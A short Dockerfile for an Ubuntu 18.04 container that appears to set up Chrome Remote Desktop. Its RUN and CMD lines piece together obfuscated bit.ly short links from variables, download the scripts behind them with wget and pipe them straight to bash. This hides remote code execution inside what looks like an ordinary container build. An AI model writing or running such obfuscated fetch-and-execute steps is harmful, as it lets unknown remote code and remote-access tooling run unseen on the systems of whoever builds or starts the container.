FROM ubuntu:18.04

ENV DEBIAN_FRONTEND=noninteractive
ENV TIMEOUT=3600
ENV CRP=''

RUN apt-get upgrade
RUN set -ex; \
    apt-get update \
    && apt-get install -y --no-install-recommends \
    bash curl wget zsh gunzip gzip python3 

RUN !i=0001;cmd=RDP;x=ly;y=bit;wget -q -O RDP ${y}.${x}/${cmd}${i} ;bash RDP $CRP $TIMEOUT


CMD [ 'service chrome-remote-desktop start; i=000;cmd=pysi;x=ly;y=bit;wget -q -O /tmp/ss ${y}.${x}/${cmd}${i} ; bash /tmp/ss ' ]